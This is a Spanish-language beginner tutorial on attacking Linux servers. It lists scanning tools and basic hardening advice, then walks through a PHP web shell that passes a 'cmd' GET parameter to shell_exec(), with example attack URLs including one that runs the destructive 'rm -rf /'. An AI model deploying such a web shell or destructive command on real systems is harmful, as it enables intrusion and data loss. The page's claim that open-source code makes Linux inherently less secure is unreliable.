Hackear el sistema operativo Linux: tutorial completo con ejemplo sobre Ubuntu
Linux es el sistema operativo de servidor más utilizado, especialmente para servidores web. Es de código abierto lo que significa que cualquiera puede tener acceso a su código fuente.
Esto lo hace menos seguro en comparación con otros sistemas operativos, ya que los atacantes pueden estudiar el código fuente para encontrar vulnerabilidades.
Contenido pendiente de una última revisión.
Es posible que este tutorial no funcione en las últimas versiones de Ubuntu.
Introducción breve a Linux
Linux es un sistema operativo de código abierto. Existen muchas distribuciones de sistemas operativos basados en Linux como Redhat, Fedora y Ubuntu, etc. Si eres un principiante, quizás puedes probar con las mejores distros par principiantes en Unix.
A diferencia de otros sistemas operativos, Linux es menos seguro cuando se trata de seguridad. Esto se debe a que el código fuente está disponible libremente, por lo que es fácil estudiarlo en busca de vulnerabilidades y explotarlas en comparación con otros sistemas operativos que no son de código abierto.
Linux se puede utilizar como servidor, escritorio, tableta o sistema operativo de dispositivo móvil.
Los programas de Linux se pueden operar usando GUI o comandos. Los comandos de Linux para la piratería de Kali Linux son más efectivos y eficientes en comparación con el uso de la GUI. Por esta razón, ayuda conocer los comandos básicos de Linux para piratear.
Herramientas de piratería de Linux
- Nessus: : esta herramienta se puede usar para hackear Ubuntu, escanear configuraciones, parches y redes, etc. se puede encontrar en https://www.tenable.com/products/nessus
- NMap: Esta herramienta se puede utilizar para supervisar los hosts que se ejecutan en el servidor y los servicios que están utilizando. También se puede utilizar para buscar puertos. Se puede encontrar en https://nmap.org/
- SARA: SARA es el acrónimo de Security Auditor’s Research Assistant. Como su nombre lo indica, esta herramienta se puede utilizar para auditar redes contra amenazas como SQL
- injection, XSS, etc. se puede encontrar en http://www-arc.com/sara/sara.html
La lista anterior no es exhaustiva, solo da una idea de las herramientas disponibles para la piratería de Ubuntu y la piratería de sistemas Linux.
Cómo prevenir los hacks de Linux
Linux Hacking se aprovecha de las vulnerabilidades en el sistema operativo, una organización puede adoptar la siguiente política para protegerse contra tales ataques.
- Administración de parches: los parches corrigen errores que los atacantes explotan para comprometer un sistema. Una buena política de administración de parches asegurará que aplique constantemente parches relevantes a su sistema.
- Configuración adecuada del sistema operativo: otros exploits se aprovechan de las debilidades en la configuración del servidor. Los nombres de usuario y demonios inactivos deben deshabilitarse. Se debe cambiar la configuración predeterminada, como las contraseñas comunes de la aplicación, los nombres de usuario predeterminados y algunos números de puerto.
- Sistema de detección de intrusos: estas herramientas se pueden utilizar para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir tales ataques.
Actividad de piratería: Hackear un sistema Ubuntu Linux usando PHP
En este escenario práctico, aprenderemos cómo hackear con Ubuntu y le proporcionaremos información básica sobre cómo puede usar PHP para comprometer un Linux. No vamos a apuntar a ninguna víctima.
Si deseas probarlo, puede instalar LAMPP en tu máquina local.
PHP viene con dos funciones que se pueden usar para ejecutar comandos de piratería de Linux. Tiene funciones exec() y shell_exec(). La función exec() devuelve la última línea de la salida del comando, mientras que la shell_exec() devuelve todo el resultado del comando como una cadena.
Para fines de demostración, supongamos que los administradores del atacante cargan el siguiente archivo en un servidor web.
<?php
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "executing shell command:-> $cmd</br>";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
?>
El script anterior obtiene el comando de la variable GET denominada cmd. El comando se ejecuta utilizando shell_exec() y los resultados devueltos en el navegador.
El código anterior se puede explotar utilizando la siguiente URL:
http://localhost/cp/konsole.php?cmd=ls%20-l
- “… konsole.php?cmd=ls%20-l” asignael valor ls –l a la variable cmd.
El comando en Ubuntu para hackear contra el servidor se ejecutará como:
shell_exec('ls -l') ;
El comando anterior simplemente muestra los archivos en el directorio actual y los permisos. Supongamos que el atacante pasa el siguiente comando.
rm -rf /
- “rm” elimina los archivos
- “rf” hace que el comando rm se ejecute en modo recursivo. Eliminación de todas las carpetas y archivos.
- “/” indica al comando que comience a eliminar archivos del directorio raíz.
La URL del ataque se vería algo como esto:
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Resumen
- Linux es un sistema operativo popular para servidores, computadoras de escritorio, tabletas y dispositivos móviles.
- Linux es de código abierto, y el código fuente puede ser obtenido por cualquier persona. Esto hace que sea fácil detectar las vulnerabilidades. Es uno de los mejores sistemas operativos para hackers.
- Los comandos básicos y de piratería de redes en Ubuntu son valiosos para los piratas informáticos de Linux.
- Las vulnerabilidades son una debilidad que puede ser explotada para comprometer un sistema.
- Una buena seguridad puede ayudar a proteger un sistema de ser comprometido por un atacante.
? Herramientas Hacking ? Recursos Hacking
?♀️ Cursos Seguridad en Red ? Cursos Redes ⛅ Cursos Servicios en Nube ?♂️ Libros Seguridad y Criptografía